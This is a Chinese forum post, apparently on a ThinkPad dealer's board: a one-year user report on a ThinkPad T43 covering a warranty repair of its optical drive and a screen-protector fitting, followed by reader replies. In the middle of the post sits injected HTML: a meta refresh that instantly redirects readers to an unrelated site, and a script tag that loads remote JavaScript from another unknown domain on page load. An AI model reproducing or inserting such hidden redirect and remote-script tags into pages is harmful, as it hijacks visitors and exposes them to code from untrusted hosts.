开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 老树发新芽,老机换新颜

先说一下,我的机器是T43 72U,2006年1月底购于XY,掐指算来,马上就一年了,早就决定快到一年的时候写个用机报告,再加上前几天折腾了一下机器,于是今天下笔~

先说T43 72U的配置吧,PM2.0 ,512M(后加到1G),80G,DVD-RW,1400X1050,指纹,蓝芽一个不少,当时是除了T43P只为配置最高的机器了,买这个机器,不为别的,只为将来跑大型软件的时候能顺畅些。事实证明,除了DVD-RW,剩下的选择是正确的。

再来用机感受吧,转眼间,小黑陪我在国外奋斗了将近一年,期间除了中毒重装几次系统之外,没出现任何问题,说实在的,我用机器还真是蛮狠,Oracle,Java,VS2003,虚拟机里的Linux和2000Server,经常同时开两个以上,再加上拼命的下迅雷和BT,小黑虽说有点吃力,但还是抗了下来,尤其是硬盘,咔咔的下了一年的BT,现在依然健健康康的工作,偶还是比较满意的。不过,现在机器外观还是有了些变化,微软的标志已经寿终正寝,键盘也有些微油,屏幕也时常脏兮兮的,没办法,忙的团团转的时候,实在想不起来照顾一下小黑~

终于到了11月底,考完了最后一门,偶的漫长暑假也开始了,(各位别以为偶发烧呢,那边放的就是暑假,和国内季节相反的)于是彻夜兼程的回到祖国的怀抱,降落在首都机场的一刻,就开始琢磨该如何好好拾掇一下小黑,以祢补过去的疏忽。哪知道XY兑换奖品的政策变了,偶在国外辛辛苦苦灌出来的XB不购用啦,扼腕叹息之后,只好发愤图强接着灌,拾掇小黑的计划也暂时搁浅。

转眼到了2007年,眼看小黑就满一岁生日的时候,突然中毒,没辙,重装系统吧,这下可发现大问题了,光驱罢工!!!没错,不刻不读,这下可麻烦了,没了光驱,等于小黑没了两条腿,给以后使用造成了极大的麻烦。反思了一下,这一年中,光驱用的的确不少,读盘无数,刻盘百张以内,但是怎么坏的,还是没想明白。不管了,还是先想想如何解决这个问题吧,于是上XY发了帖子,问斑竹怎么办,很快就有了答复,拿到XY保修,真爽快,这里先赞一个。

上周到了XY,(这也是我一年后第一次去XY,也是第一次去他们的新Office,环境不错,就是周围交通有点恐怖,我去那天是周一,都10点多了,还给我堵在朝阳门将近半个小时,幸亏是自己开车,不然,计价器的字蹦的你别提多窝火了~)说明来意,一帅哥麻利的给我开了单,留下了电话,说修好了等通知。我想,怎么着也得20天开外了吧,于是杀到中关村买了个外挂PhilipsDVD-RW,不能让小黑这段时间残废着,对吧?再说了,对笔记本的刻录机也完全失去了信心……

回到家依然热衷于在XY灌水赚钱,哪知道刚过四天就接到了XY一个MM的电话,说我的光驱搞定了,换了个新的,让我去拿。实在惊叹于XY的速度,再赞一个~回去上网一查,自己的灌水赚钱计划实施的不利,离目标还差了好多钱呢,没办法,只好将原计划瘦身,于是PM愚木丫头,用XB换了个屏幕膜,同时做个清洁,并告知了时间。

又是周一,大早就上路了,这次偶聪明了,没开车,直接坐地铁,心想,这次你堵不着了吧~哪知,朝阳门的A出口施工被堵上了,害的我从B口出来,兜了一个大圈子才到了XY,唉~瞧我这运气!进了大堂又被保安抓去登记,上次怎么没呢?难道开车的不用,走着来的就得登记?这里鄙视他们一个~

上了1204,两个老哥在验T60,没注意什么型号,期间还给一个T43装了瑞星。出来一MM,说明来意,马上取来给我新换的光驱,扫了一眼,按钮的颜色由黑的换成了银的,有点不伦不类的说~装上,刻了张DVD,到90%的时候失败!我晕,叫来一帅哥,看了下,原来是盘面的问题,虚惊一场。接着让他给贴膜清洁,帅哥立刻麻利的开工,准备工作顺利,清洁顺利,贴的前半程顺利,可惜晚节不保,最后到边脚的时候出了气泡,还好帅哥老练的采取了一些措施,气泡最终消失。贴了膜,帅哥去论坛扣了偶的XB,唉,这下俺又是穷人了,不过,看着重新焕发青春的小黑,心里还是美滋滋的离开了XY~

下边是小黑贴完膜的照片,个人感觉,开机后并没有什么不同,也许是缺乏对比吧。各位仁者见仁,智者见智~

PS:贴膜期间有个小插曲,一个老哥来买X60,现在的货已经是Thinkpad的标了,这老哥大概是有严重的IBM情节,非要IBM的标,这也难不住XY,只见帮助验机的MM从抽屉拿出个剪刀,还有一片贴纸,原来这贴纸上就是原来的IBM标,剪下一个,往腕托上一贴,Thinkpad又变成IBM了,简直是魔法大变身,乾坤大挪移,在场的人当时就被震住了~看来,联想费这么大的劲,就在MM轻轻一拍之间,给化解了~偶觉得非常有意思,顺便写出来和大家分享。

+500--tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

T43 72U外观

T43 72U外观

贴膜后的屏幕

贴膜后的屏幕

键盘及图标

键盘及图标

键盘及屏幕

键盘及屏幕

开机后的效果

开机后的效果

评分

tszmsid + 500

我当然是男士了,那包是偶姐姐的~^_^
  hehe 又来赚钱
很不錯!
还是恭喜一下
写的不错 顶一下
不错,不错,顶一个!
不错
很关心LZ贴膜的感受
小黑不错,包也挺漂亮的啊,哈哈

贴膜还是不错的

刚看了隔壁一个r51,被一杯蜂蜜水溅了,结果怎么及时擦都不行,干后液晶里面有了亮斑。象一串葡萄。开始俺还以为是立体的桌面呢。
如果有个膜的话,应该多少避免些问题。。。。
蜂蜜水,居然能进到屏幕里。。。。。。。。。。。
立体的桌面     
贴膜还是有必要的
t43,好熟悉。。。
顶,T43。
不错
机器折腾的够呛
不错好贴!!!!
够长..
关注贴膜过程
ding
另外买一台,不是更好吗
楼主有姐姐疼,羡慕!
不知道修的光驱花了多少银子?
呵呵!俺老婆大人也用的T43 ,下次俺去买T60 时,也去贴一个膜!